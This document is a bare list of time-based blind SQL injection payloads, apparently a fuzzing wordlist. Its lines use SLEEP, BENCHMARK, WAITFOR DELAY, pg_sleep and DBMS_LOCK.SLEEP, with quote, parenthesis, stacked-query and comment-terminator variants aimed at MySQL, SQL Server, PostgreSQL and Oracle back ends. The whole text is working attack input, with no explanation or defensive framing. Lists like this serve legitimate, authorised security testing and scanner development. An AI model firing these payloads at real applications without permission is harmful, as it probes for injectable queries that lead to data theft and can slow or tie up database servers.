+BENCHMARK(1000000,MD5('A'))
+SLEEP(5)
+WAITFOR DELAY '00:00:20'
+pg_sleep(10)
+BENCHMARK(1000000,MD5('A'))   -- 
+BENCHMARK(1000000,MD5('A'))  /* 
+BENCHMARK(1000000,MD5('A')))   -- 
+BENCHMARK(1000000,MD5('A')))  /* 
+BENCHMARK(1000000,MD5('A'))))   -- 
+BENCHMARK(1000000,MD5('A'))))  /* 
+BENCHMARK(1000000,MD5('A')))))  -- 
+BENCHMARK(1000000,MD5('A'))))) /* 
+SLEEP(5)   -- 
+SLEEP(5)  /* 
+SLEEP(5))   -- 
+SLEEP(5))  /* 
+SLEEP(5)))   -- 
+SLEEP(5)))  /* 
+SLEEP(5))))  -- 
+SLEEP(5)))) /* 
+WAITFOR DELAY '00:00:20'   -- 
+WAITFOR DELAY '00:00:20'  /* 
+WAITFOR DELAY '00:00:20')   -- 
+WAITFOR DELAY '00:00:20')  /* 
+WAITFOR DELAY '00:00:20'))   -- 
+WAITFOR DELAY '00:00:20'))  /* 
+WAITFOR DELAY '00:00:20')))  -- 
+WAITFOR DELAY '00:00:20'))) /* 
+pg_sleep(10)   -- 
+pg_sleep(10)  /* 
+pg_sleep(10))   -- 
+pg_sleep(10))  /* 
+pg_sleep(10)))   -- 
+pg_sleep(10)))  /* 
+pg_sleep(10))))  -- 
+pg_sleep(10)))) /* 
'+BENCHMARK(1000000,MD5('A'))+'a
'+SLEEP(5)+'a
'+WAITFOR DELAY '00:00:20'+'a
'+pg_sleep(10)+'a
'+BENCHMARK(1000000,MD5('A'))   -- 
'+BENCHMARK(1000000,MD5('A'))  /* 
'+BENCHMARK(1000000,MD5('A')))   -- 
'+BENCHMARK(1000000,MD5('A')))  /* 
'+BENCHMARK(1000000,MD5('A'))))   -- 
'+BENCHMARK(1000000,MD5('A'))))  /* 
'+BENCHMARK(1000000,MD5('A')))))  -- 
'+BENCHMARK(1000000,MD5('A'))))) /* 
'+SLEEP(5)   -- 
'+SLEEP(5)  /* 
'+SLEEP(5))   -- 
'+SLEEP(5))  /* 
'+SLEEP(5)))   -- 
'+SLEEP(5)))  /* 
'+SLEEP(5))))  -- 
'+SLEEP(5)))) /* 
'+WAITFOR DELAY '00:00:20'   -- 
'+WAITFOR DELAY '00:00:20'  /* 
'+WAITFOR DELAY '00:00:20')   -- 
'+WAITFOR DELAY '00:00:20')  /* 
'+WAITFOR DELAY '00:00:20'))   -- 
'+WAITFOR DELAY '00:00:20'))  /* 
'+WAITFOR DELAY '00:00:20')))  -- 
'+WAITFOR DELAY '00:00:20'))) /* 
'+pg_sleep(10)   -- 
'+pg_sleep(10)  /* 
'+pg_sleep(10))   -- 
'+pg_sleep(10))  /* 
'+pg_sleep(10)))   -- 
'+pg_sleep(10)))  /* 
'+pg_sleep(10))))  -- 
'+pg_sleep(10)))) /* 
(BENCHMARK(1000000,MD5('A')))
(SLEEP(5))
(WAITFOR DELAY '00:00:20')
(pg_sleep(10))
(BENCHMARK(1000000,MD5('A')))   -- 
(BENCHMARK(1000000,MD5('A')))  /* 
(BENCHMARK(1000000,MD5('A'))))   -- 
(BENCHMARK(1000000,MD5('A'))))  /* 
(BENCHMARK(1000000,MD5('A')))))   -- 
(BENCHMARK(1000000,MD5('A')))))  /* 
(BENCHMARK(1000000,MD5('A'))))))  -- 
(BENCHMARK(1000000,MD5('A')))))) /* 
(SLEEP(5))   -- 
(SLEEP(5))  /* 
(SLEEP(5)))   -- 
(SLEEP(5)))  /* 
(SLEEP(5))))   -- 
(SLEEP(5))))  /* 
(SLEEP(5)))))  -- 
(SLEEP(5))))) /* 
(WAITFOR DELAY '00:00:20')   -- 
(WAITFOR DELAY '00:00:20')  /* 
(WAITFOR DELAY '00:00:20'))   -- 
(WAITFOR DELAY '00:00:20'))  /* 
(WAITFOR DELAY '00:00:20')))   -- 
(WAITFOR DELAY '00:00:20')))  /* 
(WAITFOR DELAY '00:00:20'))))  -- 
(WAITFOR DELAY '00:00:20')))) /* 
(pg_sleep(10))   -- 
(pg_sleep(10))  /* 
(pg_sleep(10)))   -- 
(pg_sleep(10)))  /* 
(pg_sleep(10))))   -- 
(pg_sleep(10))))  /* 
(pg_sleep(10)))))  -- 
(pg_sleep(10))))) /* 
 ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
 ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
 ; WAITFOR DELAY '00:00:20';  -- 
 ; WAITFOR DELAY '00:00:20'; /* 
 ; select BENCHMARK(1000000,MD5('A'));  -- 
 ; select BENCHMARK(1000000,MD5('A')); /* 
 ; select SLEEP(5);  -- 
 ; select SLEEP(5); /* 
 ; select WAITFOR DELAY '00:00:20';  -- 
 ; select WAITFOR DELAY '00:00:20'; /* 
 ; select pg_sleep(10);  -- 
 ; select pg_sleep(10); /* 
) ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
) ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
) ; WAITFOR DELAY '00:00:20';  -- 
) ; WAITFOR DELAY '00:00:20'; /* 
) ; select BENCHMARK(1000000,MD5('A'));  -- 
) ; select BENCHMARK(1000000,MD5('A')); /* 
) ; select SLEEP(5);  -- 
) ; select SLEEP(5); /* 
) ; select WAITFOR DELAY '00:00:20';  -- 
) ; select WAITFOR DELAY '00:00:20'; /* 
) ; select pg_sleep(10);  -- 
) ; select pg_sleep(10); /* 
)) ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
)) ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
)) ; WAITFOR DELAY '00:00:20';  -- 
)) ; WAITFOR DELAY '00:00:20'; /* 
)) ; select BENCHMARK(1000000,MD5('A'));  -- 
)) ; select BENCHMARK(1000000,MD5('A')); /* 
)) ; select SLEEP(5);  -- 
)) ; select SLEEP(5); /* 
)) ; select WAITFOR DELAY '00:00:20';  -- 
)) ; select WAITFOR DELAY '00:00:20'; /* 
)) ; select pg_sleep(10);  -- 
)) ; select pg_sleep(10); /* 
))); BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
))); BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
))); WAITFOR DELAY '00:00:20';  -- 
))); WAITFOR DELAY '00:00:20'; /* 
))); select BENCHMARK(1000000,MD5('A'));  -- 
))); select BENCHMARK(1000000,MD5('A')); /* 
))); select SLEEP(5);  -- 
))); select SLEEP(5); /* 
))); select WAITFOR DELAY '00:00:20';  -- 
))); select WAITFOR DELAY '00:00:20'; /* 
))); select pg_sleep(10);  -- 
))); select pg_sleep(10); /* 
' ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
' ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
' ; WAITFOR DELAY '00:00:20';  -- 
' ; WAITFOR DELAY '00:00:20'; /* 
' ; select BENCHMARK(1000000,MD5('A'));  -- 
' ; select BENCHMARK(1000000,MD5('A')); /* 
' ; select SLEEP(5);  -- 
' ; select SLEEP(5); /* 
' ; select WAITFOR DELAY '00:00:20';  -- 
' ; select WAITFOR DELAY '00:00:20'; /* 
' ; select pg_sleep(10);  -- 
' ; select pg_sleep(10); /* 
') ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
') ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
') ; WAITFOR DELAY '00:00:20';  -- 
') ; WAITFOR DELAY '00:00:20'; /* 
') ; select BENCHMARK(1000000,MD5('A'));  -- 
') ; select BENCHMARK(1000000,MD5('A')); /* 
') ; select SLEEP(5);  -- 
') ; select SLEEP(5); /* 
') ; select WAITFOR DELAY '00:00:20';  -- 
') ; select WAITFOR DELAY '00:00:20'; /* 
') ; select pg_sleep(10);  -- 
') ; select pg_sleep(10); /* 
')) ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
')) ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
')) ; WAITFOR DELAY '00:00:20';  -- 
')) ; WAITFOR DELAY '00:00:20'; /* 
')) ; select BENCHMARK(1000000,MD5('A'));  -- 
')) ; select BENCHMARK(1000000,MD5('A')); /* 
')) ; select SLEEP(5);  -- 
')) ; select SLEEP(5); /* 
')) ; select WAITFOR DELAY '00:00:20';  -- 
')) ; select WAITFOR DELAY '00:00:20'; /* 
')) ; select pg_sleep(10);  -- 
')) ; select pg_sleep(10); /* 
'))); BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
'))); BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
'))); WAITFOR DELAY '00:00:20';  -- 
'))); WAITFOR DELAY '00:00:20'; /* 
'))); select BENCHMARK(1000000,MD5('A'));  -- 
'))); select BENCHMARK(1000000,MD5('A')); /* 
'))); select SLEEP(5);  -- 
'))); select SLEEP(5); /* 
'))); select WAITFOR DELAY '00:00:20';  -- 
'))); select WAITFOR DELAY '00:00:20'; /* 
'))); select pg_sleep(10);  -- 
'))); select pg_sleep(10); /* 